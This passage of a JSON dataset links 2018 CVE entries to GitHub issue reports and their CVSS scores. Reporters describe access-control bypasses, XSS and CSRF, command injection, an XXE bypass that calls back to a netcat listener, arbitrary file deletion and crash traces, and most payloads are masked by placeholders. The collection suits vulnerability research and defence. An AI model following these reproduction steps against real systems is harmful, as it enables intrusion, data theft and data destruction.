  28075. "description": "Infinite loop inside APITAG APITAG There seems an infinite loop inside APITAG at URLTAG NUMBERTAG c6f3). It checks APITAG at line NUMBERTAG APITAG is updated at line NUMBERTAG However sometimes APITAG may be NUMBERTAG fffffff4, making the subtraction to have no effect. A concrete input is available here URLTAG .",
  28076. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28077. "severity": "MEDIUM",
  28078. "baseScore": 6.5,
  28079. "impactScore": 3.6,
  28080. "exploitabilityScore": 2.8
  28081. },
  28082. {
  28083. "CVE_ID": "CVE-2018-19109",
  28084. "Issue_Url_old": "https://github.com/xujeff/tianti/issues/29",
  28085. "Issue_Url_new": "https://github.com/xujeff/tianti/issues/29",
  28086. "Repo_new": "xujeff/tianti",
  28087. "Issue_Created_At": "2018-11-07T16:33:35Z",
  28088. "description": "There is a Incorrect accece control flaws in your project. Hello,guy,there is a Incorrect access control flaws in your project. The following is the proof of this flaws. There are two roles in the project,permission role and super administrator APITAG permission role only has the permission to change the permission of the users,and the super administrator role has all of the permissions,which contains permission management , content management , skin management . when we use super administrator role to login in,we can see: FILETAG As the picture shows,the super administrator has three permissions. When we use permission role to login in ,we can see: FILETAG as the picture show,the permission role has only one permission. How is the flaws happen? We know if the bakend controller dosen't check the permission of the role,it will cause Incorrect access control flaws. see the code of the cmscontroller the path of the cmscontroller is: PATHTAG FILETAG In this place,we can see it use the spring framework,the request of PATHTAG map to function called APITAG dosen't do permission check,which will cause the Incorect acess contol flaws. How to proof it? We request the url \" URLTAG \" directly. FILETAG We can see,the permission role can access the column list page,and it can edit the column too. FILETAG And in the skin management,there exists Incorect access control,too. We can use permission role to access the url \" URLTAG \" FILETAG we can location the flaws code in PATHTAG FILETAG it map the request PATHTAG to the function APITAG dosen't do permission check. Advice\uff1a FILETAG before excuting the main logic code of the function where the controller receiver the request from the frontend,please do permission check. Hope ,you guy fix this flaws quickly ,if you have some questions,please contact me with the e mail: EMAILTAG",
  28089. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  28090. "severity": "HIGH",
  28091. "baseScore": 8.8,
  28092. "impactScore": 5.9,
  28093. "exploitabilityScore": 2.8
  28094. },
  28095. {
  28096. "CVE_ID": "CVE-2018-19114",
  28097. "Issue_Url_old": "https://github.com/lifei6671/mindoc/issues/384",
  28098. "Issue_Url_new": "https://github.com/mindoc-org/mindoc/issues/384",
  28099. "Repo_new": "mindoc-org/mindoc",
  28100. "Issue_Created_At": "2018-11-08T15:00:25Z",
  28101. "description": "allow attacker unauthorized access to user account. Target mindoc APITAG modify APITAG to APITAG APITAG after modify APITAG , you're login as admin (super admin account). Solution check APITAG , only allow a zA Z NUMBERTAG Reference [astaxie/beego NUMBERTAG URLTAG",
  28102. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  28103. "severity": "HIGH",
  28104. "baseScore": 8.8,
  28105. "impactScore": 5.9,
  28106. "exploitabilityScore": 2.8
  28107. },
  28108. {
  28109. "CVE_ID": "CVE-2018-19121",
  28110. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/85",
  28111. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/85",
  28112. "Repo_new": "mz-automation/libiec61850",
  28113. "Issue_Created_At": "2018-11-08T15:40:58Z",
  28114. "description": "SEGV in function APITAG I built libiec NUMBERTAG URLTAG in APITAG NUMBERTAG with APITAG ( APITAG before make ). I ran the APITAG in directory APITAG by command APITAG , however, there is a SEGV in function APITAG in APITAG when the selected interface is unable. Here is output with ASAN information: ERRORTAG",
  28115. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  28116. "severity": "MEDIUM",
  28117. "baseScore": 4.3,
  28118. "impactScore": 1.4,
  28119. "exploitabilityScore": 2.8
  28120. },
  28121. {
  28122. "CVE_ID": "CVE-2018-19122",
  28123. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/86",
  28124. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/86",
  28125. "Repo_new": "mz-automation/libiec61850",
  28126. "Issue_Created_At": "2018-11-08T15:41:19Z",
  28127. "description": "SEGV in function APITAG I built libiec NUMBERTAG URLTAG in APITAG NUMBERTAG with APITAG ( APITAG before make ). I ran the APITAG in directory APITAG by command APITAG , however, there is a SEGV in function APITAG in APITAG when the selected interface is unable. Here is output with ASAN information: ERRORTAG",
  28128. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  28129. "severity": "MEDIUM",
  28130. "baseScore": 4.3,
  28131. "impactScore": 1.4,
  28132. "exploitabilityScore": 2.8
  28133. },
  28134. {
  28135. "CVE_ID": "CVE-2018-19133",
  28136. "Issue_Url_old": "https://github.com/flarum/core/issues/1628",
  28137. "Issue_Url_new": "https://github.com/flarum/framework/issues/1628",
  28138. "Repo_new": "flarum/framework",
  28139. "Issue_Created_At": "2018-11-08T10:57:36Z",
  28140. "description": "A serious leak can get everyone's email address. Information Example URL\uff1a URLTAG Associated files\uff1a PATHTAG PATHTAG Reproduce\uff1a Step NUMBERTAG Use account to log on to this website Step NUMBERTAG Click URLTAG > Click Change Email > Fill in a different email address and correct password > Click Save Changes Step NUMBERTAG This time we can get a request and a response request: FILETAG response\uff1a FILETAG This response contains my email address Step NUMBERTAG the most important step): We can destroy JSON body and modify the ID contained in URL New Request\uff1a FILETAG After re sending this request, we will get a new response. New response: FILETAG As shown, this response contains the e mail addresses of other people. Summary: As long as we repeat the fifth step, we can download all people's mailbox addresses and some other information. This is a very dangerous BUG. Almost all versions have this flaw. I hope you can repair them as soon as possible.",
  28141. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  28142. "severity": "MEDIUM",
  28143. "baseScore": 5.3,
  28144. "impactScore": 1.4,
  28145. "exploitabilityScore": 3.9
  28146. },
  28147. {
  28148. "CVE_ID": "CVE-2018-19136",
  28149. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/79",
  28150. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/79",
  28151. "Repo_new": "domainmod/domainmod",
  28152. "Issue_Created_At": "2018-11-09T07:57:34Z",
  28153. "description": "Cross Site Scripting Vulnerability in APITAG NUMBERTAG Multiple XSS vulnerability was discovered in domainmod NUMBERTAG There are two XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML NUMBERTAG URLTAG NUMBERTAG URLTAG",
  28154. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28155. "severity": "MEDIUM",
  28156. "baseScore": 6.1,
  28157. "impactScore": 2.7,
  28158. "exploitabilityScore": 2.8
  28159. },
  28160. {
  28161. "CVE_ID": "CVE-2018-19138",
  28162. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/11",
  28163. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/11",
  28164. "Repo_new": "yanchongchong/swallow",
  28165. "Issue_Created_At": "2018-11-09T04:18:56Z",
  28166. "description": "APITAG CSRF. CODETAG",
  28167. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28168. "severity": "HIGH",
  28169. "baseScore": 8.8,
  28170. "impactScore": 5.9,
  28171. "exploitabilityScore": 2.8
  28172. },
  28173. {
  28174. "CVE_ID": "CVE-2018-19148",
  28175. "Issue_Url_old": "https://github.com/mholt/caddy/issues/2334",
  28176. "Issue_Url_new": "https://github.com/caddyserver/caddy/issues/2334",
  28177. "Repo_new": "caddyserver/caddy",
  28178. "Issue_Created_At": "2018-11-05T07:59:53Z",
  28179. "description": "Problem with the way Caddy serves multiple certificates NUMBERTAG What version of Caddy are you using ( APITAG )? Caddy NUMBERTAG dfb NUMBERTAG Sun No NUMBERTAG UTC NUMBERTAG unofficial NUMBERTAG What are you trying to do? I'm trying to fetch a certificate from my domain APITAG by using the following shell script. CODETAG NUMBERTAG What is your entire Caddyfile? CODETAG NUMBERTAG How did you run Caddy (give the full command and describe the execution environment)? APITAG I'm running Caddy on Debian NUMBERTAG stretch NUMBERTAG Please paste any relevant HTTP request(s) here. N/A NUMBERTAG What did you expect to see? The certificate of APITAG NUMBERTAG What did you see instead (give full error messages and/or log)? The certificate of either app NUMBERTAG app NUMBERTAG or APITAG The certificate changes each time you run the shell script NUMBERTAG How can someone who is starting from scratch reproduce the bug as minimally as possible NUMBERTAG Install Caddy NUMBERTAG Set up three or more subdomains on your own domain NUMBERTAG Copy my Caddyfile and adjust it as needed to fetch a certificate for each subdomain NUMBERTAG Use the provided shell script to fetch the certificate of one of the subdomains. This issue does not affect sites which are not served with Caddy. To verify this, run the same shell script on such a domain and observe that the certificate in the output is the same every time you run it and that it is the correct one for the domain. The practical relevance of this problem is that the remote control software APITAG cannot fetch the correct certificate from a subdomain that is served with Caddy because it receives a different certificate URLTAG each time it tries to fetch it.",
  28180. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
  28181. "severity": "LOW",
  28182. "baseScore": 3.7,
  28183. "impactScore": 1.4,
  28184. "exploitabilityScore": 2.2
  28185. },
  28186. {
  28187. "CVE_ID": "CVE-2018-19148",
  28188. "Issue_Url_old": "https://github.com/mholt/caddy/issues/1303",
  28189. "Issue_Url_new": "https://github.com/caddyserver/caddy/issues/1303",
  28190. "Repo_new": "caddyserver/caddy",
  28191. "Issue_Created_At": "2016-12-19T09:58:02Z",
  28192. "description": "Caddy serves wrong SSL cert for http only sites NUMBERTAG What version of Caddy are you running ( APITAG )? APITAG NUMBERTAG What are you trying to do? I want to have multiple virtual hosts, some http s , some http only. I want the http only hosts to not respond to http s requests with a wrong certificate NUMBERTAG What is your entire Caddyfile? APITAG NUMBERTAG How did you run Caddy (give the full command and describe the execution environment)? I created the reproducible example from above on my Mac ( APITAG ) but I am having this problem in production on APITAG so I don\u2019t think it is OS related. The working directory contains the Caddyfile from above. APITAG NUMBERTAG What did you expect to see? Caddy starts fine and serves both vhosts, one with https and the other with http. I expect Caddy to not respond at all when I try to access APITAG as that virtual hosts is explicitly configured as http, not http s NUMBERTAG What did you see instead (give full error messages and/or log)? When accessing APITAG (the host which is explicitly http), Caddy sends the cert for APITAG , which results in an SSL error. (I know that in this example it always results in an error because the cert is self signed, but in production this would serve a trusted cert from Let\u2019s Encrypt). When ignoring the warning, Caddy responds with APITAG . While this is technically correct, Caddy should not accept the connection in the first place. In addition to the SSL error, this also leaks information about at least one other site (the one Caddy takes the certificate from) that is set up on the host NUMBERTAG How can someone who is starting from scratch reproduce this behavior as minimally as possible NUMBERTAG Use the Caddyfile from step NUMBERTAG Update the root directive so that Caddy finds some files to serve NUMBERTAG Edit your APITAG to include the following NUMBERTAG Start Caddy as described in step NUMBERTAG APITAG Thanks so much for any responses. I\u2019m sorry if there is already an issue for this or if this is a known bug, I couldn\u2019t find anything related to this.",
  28193. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
  28194. "severity": "LOW",
  28195. "baseScore": 3.7,
  28196. "impactScore": 1.4,
  28197. "exploitabilityScore": 2.2
  28198. },
  28199. {
  28200. "CVE_ID": "CVE-2018-19168",
  28201. "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/250",
  28202. "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/250",
  28203. "Repo_new": "xtr4nge/fruitywifi",
  28204. "Issue_Created_At": "2018-11-10T21:41:51Z",
  28205. "description": "Unauthorized remote code execution as root. APITAG contains two security vulnerabilities that allow an unauthorized attacker to take complete control over the system. The first vulnerability has already been released by another researcher and was assigned APITAG : > APITAG (aka APITAG NUMBERTAG allows remote attackers to execute arbitrary commands via shell metacharacters in the io_mode, ap_mode, io_action, io_in_iface, io_in_set, io_in_ip, io_in_mask, io_in_gw, io_out_iface, io_out_set, io_out_mask, io_out_gw, iface, or domain parameter to PATHTAG or the APITAG hostapd_secure, hostapd_wpa_passphrase, or supplicant_ssid parameter to FILETAG . Now to exploit this vulnerability an attacker needs a valid session, but it turns out that command injection is also possible in a file that lacks any access control. The file APITAG is accessible to anyone (erroneously?) and the validation attempt in APITAG can be bypassed. So a POST request to APITAG with a APITAG value of APITAG will execute APITAG . Even if the regex used in APITAG were correct it would still be to lenient (because it allows APITAG and spaces).",
  28206. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28207. "severity": "CRITICAL",
  28208. "baseScore": 9.8,
  28209. "impactScore": 5.9,
  28210. "exploitabilityScore": 3.9
  28211. },
  28212. {
  28213. "CVE_ID": "CVE-2018-19170",
  28214. "Issue_Url_old": "https://github.com/JpressProjects/jpress/issues/89",
  28215. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/89",
  28216. "Repo_new": "jpressprojects/jpress",
  28217. "Issue_Created_At": "2018-11-08T11:38:08Z",
  28218. "description": "There is a stored xss via PATHTAG Hello,my nickname is isecream,I found three stored xss in the form First, access the page FILETAG FILETAG then use the payload: \"> APITAG FILETAG when i submit FILETAG FILETAG FILETAG",
  28219. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  28220. "severity": "MEDIUM",
  28221. "baseScore": 4.8,
  28222. "impactScore": 2.7,
  28223. "exploitabilityScore": 1.7
  28224. },
  28225. {
  28226. "CVE_ID": "CVE-2018-19178",
  28227. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/6",
  28228. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/6",
  28229. "Repo_new": "zchuanzhao/jeesns",
  28230. "Issue_Created_At": "2018-11-09T04:05:00Z",
  28231. "description": "APITAG filter is APITAG leads to storage XSS vulnerabilities NUMBERTAG ulnerability analysis Code PATHTAG It can be seen that there is no good filtering in parameter filtering. package APITAG import APITAG import APITAG import APITAG / XSS\u653b\u51fb\u5904\u7406 Created by zchuanzhao on PATHTAG / public class APITAG extends APITAG { public APITAG APITAG { APITAG } MENTIONTAG public String FILETAG Trigger the savings XSS vulnerability FILETAG Likewise, enter the content in the comments section of the post\uff1a APITAG FILETAG APITAG filter is APITAG leads to storage XSS vulnerabilities FILETAG NUMBERTAG bug fi NUMBERTAG Coding unification The encoding of each data layer of the site is uniform, and it is recommended to use all utf NUMBERTAG encoding. The inconsistency of upper and lower encoding may cause some filtering models to be bypassed NUMBERTAG Http Only cookie The purpose of many XSS attacks is to obtain the user's cookie, marking the important cookie as HTTP only, so that when the browser makes a request to the server, it will bring the cookie field, but the cookie cannot be accessed in the script. In this way, the XSS attack can avoid using js's APITAG to acquire the cookie NUMBERTAG Input content length control For untrusted input, you should limit it to a reasonable APITAG it cannot completely prevent XSS from happening, it can increase the difficulty of XSS attack NUMBERTAG Input check Input check is generally to check whether the data entered by the user contains some special characters, such as <, >, ', ', etc. If special characters are found, these characters are filtered or coded.",
  28232. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  28233. "severity": "MEDIUM",
  28234. "baseScore": 5.4,
  28235. "impactScore": 2.7,
  28236. "exploitabilityScore": 2.3
  28237. },
  28238. {
  28239. "CVE_ID": "CVE-2018-19180",
  28240. "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/1",
  28241. "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/1",
  28242. "Repo_new": "doublefast/yunucms",
  28243. "Issue_Created_At": "2018-11-09T06:58:06Z",
  28244. "description": "Arbitrary File Deletion & Launch a new installation process to execute PHP code. Two issue was discovered in yunucms NUMBERTAG APITAG File Deletion APITAG a new installation process to execute PHP code APITAG is a Arbitrary File Deletion attacks vulnerability which allows remote attackers to unlink any file The code section which made this vulnerability possible is found in the PATHTAG file: line NUMBERTAG ERRORTAG In the APITAG function shown above, the content of $_POST FILETAG APITAG has been removed. APITAG a new installation process to execute PHP code After remove APITAG \uff0cremote attackers can Launch a new installation process. The code section which made this vulnerability possible is found in the PATHTAG file: line NUMBERTAG CODETAG Follow function APITAG PATHTAG file: line NUMBERTAG ERRORTAG Use file_put_contents to wirte $arr into APITAG POC In installation process setup2 ,we can input APITAG to \u6570\u636e\u8868\u524d\u7f00 DB_PREFIX FILETAG When finish installation process\uff0cwe can get FILETAG like this: FILETAG Visit homepage URLTAG create file PATHTAG FILETAG",
  28245. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28246. "severity": "CRITICAL",
  28247. "baseScore": 9.8,
  28248. "impactScore": 5.9,
  28249. "exploitabilityScore": 3.9
  28250. },
  28251. {
  28252. "CVE_ID": "CVE-2018-19182",
  28253. "Issue_Url_old": "https://github.com/engelsystem/engelsystem/issues/494",
  28254. "Issue_Url_new": "https://github.com/engelsystem/engelsystem/issues/494",
  28255. "Repo_new": "engelsystem/engelsystem",
  28256. "Issue_Created_At": "2018-11-11T12:45:04Z",
  28257. "description": "Security Vulnerability. Hi, I found a security vulnerability in engelsystem. How shall I provide more details? Best Regards mschop",
  28258. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28259. "severity": "HIGH",
  28260. "baseScore": 8.8,
  28261. "impactScore": 5.9,
  28262. "exploitabilityScore": 2.8
  28263. },
  28264. {
  28265. "CVE_ID": "CVE-2018-19183",
  28266. "Issue_Url_old": "https://github.com/ethereumjs/ethereumjs-vm/issues/386",
  28267. "Issue_Url_new": "https://github.com/ethereumjs/ethereumjs-monorepo/issues/386",
  28268. "Repo_new": "ethereumjs/ethereumjs-monorepo",
  28269. "Issue_Created_At": "2018-11-10T01:55:10Z",
  28270. "description": "Unexpected runcode fail. I am using ethereumjs vm ERRORTAG function to run my contract bytecode, and I use the step event for trace output. When I set the runcode attribute APITAG , and tried to run it, I got the output of REVERT opcode, It means runcode was failed. REVERT output APITAG",
  28271. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  28272. "severity": "HIGH",
  28273. "baseScore": 7.5,
  28274. "impactScore": 3.6,
  28275. "exploitabilityScore": 3.9
  28276. },
  28277. {
  28278. "CVE_ID": "CVE-2018-19184",
  28279. "Issue_Url_old": "https://github.com/ethereum/go-ethereum/issues/18069",
  28280. "Issue_Url_new": "https://github.com/ethereum/go-ethereum/issues/18069",
  28281. "Repo_new": "ethereum/go-ethereum",
  28282. "Issue_Created_At": "2018-11-10T04:34:36Z",
  28283. "description": "Runtime error: invalid memory address or nil pointer dereference and a SEGV signal occurred. When we use APITAG to run the byte code. ERRORTAG the byte code is : ERRORTAG",
  28284. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  28285. "severity": "HIGH",
  28286. "baseScore": 7.5,
  28287. "impactScore": 3.6,
  28288. "exploitabilityScore": 3.9
  28289. },
  28290. {
  28291. "CVE_ID": "CVE-2018-19185",
  28292. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/87",
  28293. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/87",
  28294. "Repo_new": "mz-automation/libiec61850",
  28295. "Issue_Created_At": "2018-11-11T13:49:41Z",
  28296. "description": "Another heap buffer overflow in function APITAG This issue seems to be similiar to NUMBERTAG which is reported several days ago. Although this bug has been fixed, there is another specific APITAG sequence which can cause heap buffer overflow in another trace. The following is the special sequence and the complete version of APITAG that triggers heap buffer overflow is FILETAG . CODETAG Here is the ASAN information: ERRORTAG",
  28297. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28298. "severity": "CRITICAL",
  28299. "baseScore": 9.8,
  28300. "impactScore": 5.9,
  28301. "exploitabilityScore": 3.9
  28302. },
  28303. {
  28304. "CVE_ID": "CVE-2018-19188",
  28305. "Issue_Url_old": "https://github.com/payfort/payfort-php-sdk/issues/12",
  28306. "Issue_Url_new": "https://github.com/payfort/payfort-php-sdk/issues/12",
  28307. "Repo_new": "payfort/payfort-php-sdk",
  28308. "Issue_Created_At": "2017-02-23T06:44:59Z",
  28309. "description": "A Reflected XSS vulnerability in this sdk. Hello: I found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in 'fort_id' HTTP _REQUEST parameter that will be passed to \u201cpayfort php sdk APITAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow screenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
  28310. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28311. "severity": "MEDIUM",
  28312. "baseScore": 6.1,
  28313. "impactScore": 2.7,
  28314. "exploitabilityScore": 2.8
  28315. },
  28316. {
  28317. "CVE_ID": "CVE-2018-19277",
  28318. "Issue_Url_old": "https://github.com/PHPOffice/PhpSpreadsheet/issues/771",
  28319. "Issue_Url_new": "https://github.com/phpoffice/phpspreadsheet/issues/771",
  28320. "Repo_new": "phpoffice/phpspreadsheet",
  28321. "Issue_Created_At": "2018-11-12T20:44:26Z",
  28322. "description": "XXE Injection Security scan bypass. This is: CODETAG What is the expected behavior? The APITAG function is used to prevent XXE attacks. What is the current behavior? The APITAG function can be bypassed by using UTF NUMBERTAG encoding. What are the steps to reproduce? Replace the IP address and port APITAG with something you control. CODETAG FILETAG Replace APITAG in your xlsx file with the one above and re zip the excel sheet. I've attached an xlsx file that makes a request as configured above. File FILETAG Set up a listener either with Python, netcat, etc. locally and watch for a request that will be made once the xlsx is read by the library. Please let me know if you would like more details on generating the xlsx file or if you need any clarification about the issue. Which versions of APITAG and PHP are affected? I believe it affects all versions.",
  28323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28324. "severity": "HIGH",
  28325. "baseScore": 8.8,
  28326. "impactScore": 5.9,
  28327. "exploitabilityScore": 2.8
  28328. },
  28329. {
  28330. "CVE_ID": "CVE-2018-19277",
  28331. "Issue_Url_old": "https://github.com/MewesK/TwigSpreadsheetBundle/issues/18",
  28332. "Issue_Url_new": "https://github.com/mewesk/twigspreadsheetbundle/issues/18",
  28333. "Repo_new": "mewesk/twigspreadsheetbundle",
  28334. "Issue_Created_At": "2018-11-22T17:23:13Z",
  28335. "description": "Update phpoffice/phpspreadsheet. It's necessary to update phpoffice/phpspreadsheet because of CVETAG See URLTAG Any plans to release an updated version of this bundle soon?",
  28336. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28337. "severity": "HIGH",
  28338. "baseScore": 8.8,
  28339. "impactScore": 5.9,
  28340. "exploitabilityScore": 2.8
  28341. },
  28342. {
  28343. "CVE_ID": "CVE-2018-19289",
  28344. "Issue_Url_old": "https://github.com/xCss/Valine/issues/127",
  28345. "Issue_Url_new": "https://github.com/xcss/valine/issues/127",
  28346. "Repo_new": "xcss/valine",
  28347. "Issue_Created_At": "2018-11-14T17:13:13Z",
  28348. "description": "In the latest version, exist HTML injection, Combined with pdf javascript excute, lead to url redirect vulnerable.. In the latest version, exist HTML injection, Combined with pdf javascript excute, lead to url redirect vulnerable NUMBERTAG HTML injection FILETAG FILETAG",
  28349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28350. "severity": "MEDIUM",
  28351. "baseScore": 6.1,
  28352. "impactScore": 2.7,
  28353. "exploitabilityScore": 2.8
  28354. },
  28355. {
  28356. "CVE_ID": "CVE-2018-19291",
  28357. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/60",
  28358. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/60",
  28359. "Repo_new": "chekun/dilicms",
  28360. "Issue_Created_At": "2018-11-11T18:15:37Z",
  28361. "description": "There is two CSRF vulnerability that can delete user or usergroup. Software Link : URLTAG After the administrator logged in,open the page FILETAG delete user POC: APITAG FILETAG delete group POC: APITAG",
  28362. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  28363. "severity": "MEDIUM",
  28364. "baseScore": 6.5,
  28365. "impactScore": 3.6,
  28366. "exploitabilityScore": 2.8
  28367. },
  28368. {
  28369. "CVE_ID": "CVE-2018-19329",
  28370. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/113",
  28371. "Issue_Url_new": "https://github.com/greencms/greencms/issues/113",
  28372. "Repo_new": "greencms/greencms",
  28373. "Issue_Created_At": "2018-11-17T06:38:06Z",
  28374. "description": "There is a vulnerability that can delete the arbitrary file. After the administrator logged in, open the following link URLTAG Click the delete button\uff0cwe can get a link like this URLTAG the string APITAG is encoded by base NUMBERTAG so we can decode it \uff0cthe decoded string is PATHTAG so we can encode the string like this PATHTAG and structure the link URLTAG when we visit this link,the FILETAG file is deleted",
  28375. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  28376. "severity": "MEDIUM",
  28377. "baseScore": 4.9,
  28378. "impactScore": 3.6,
  28379. "exploitabilityScore": 1.2
  28380. },
  28381. {
  28382. "CVE_ID": "CVE-2018-19353",
  28383. "Issue_Url_old": "https://github.com/ansilove/libansilove/issues/4",
  28384. "Issue_Url_new": "https://github.com/ansilove/libansilove/issues/4",
  28385. "Repo_new": "ansilove/libansilove",
  28386. "Issue_Created_At": "2018-11-18T08:25:22Z",
  28387. "description": "A Segmentation fault. just as pic show FILETAG when the libansilove parser crafted file, it will cause a OOB if the APITAG assignned wrong as the valgrind detect, there is a APITAG read\" PATHTAG valgrind ./ansilove i poc.ans NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./ansilove i poc.ans NUMBERTAG APITAG NUMBERTAG ANSI / ASCII art to PNG converter Copyright (c NUMBERTAG Stefan Vogt, Brian Cassidy, and Frederic Cambus NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG F NUMBERTAG strcmp_sse2_unaligned (strcmp sse2 APITAG NUMBERTAG by NUMBERTAG C0: main APITAG NUMBERTAG Address NUMBERTAG a NUMBERTAG b0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2EDEB: free (in PATHTAG NUMBERTAG by NUMBERTAG E6: APITAG APITAG NUMBERTAG by NUMBERTAG E6: APITAG APITAG NUMBERTAG by NUMBERTAG F: main APITAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG F: main APITAG NUMBERTAG Input File: poc.ans Output File: FILETAG NUMBERTAG Conditional jump or move depends on uninitialised value(s NUMBERTAG at NUMBERTAG E3D5B4: ansilove_ansi (in PATHTAG NUMBERTAG by NUMBERTAG A2: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG strtol_l_internal APITAG NUMBERTAG by NUMBERTAG D0F: strtonum APITAG NUMBERTAG by NUMBERTAG E3D NUMBERTAG ansilove_ansi (in PATHTAG NUMBERTAG by NUMBERTAG A2: main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEGV): dumping core NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG strtol_l_internal APITAG NUMBERTAG by NUMBERTAG D0F: strtonum APITAG NUMBERTAG by NUMBERTAG E3D NUMBERTAG ansilove_ansi (in PATHTAG NUMBERTAG by NUMBERTAG A2: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG Use track origins=yes to see where uninitialised values come from NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault FILETAG",
  28388. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28389. "severity": "MEDIUM",
  28390. "baseScore": 6.5,
  28391. "impactScore": 3.6,
  28392. "exploitabilityScore": 2.8
  28393. },
  28394. {
  28395. "CVE_ID": "CVE-2018-19360",
  28396. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2186",
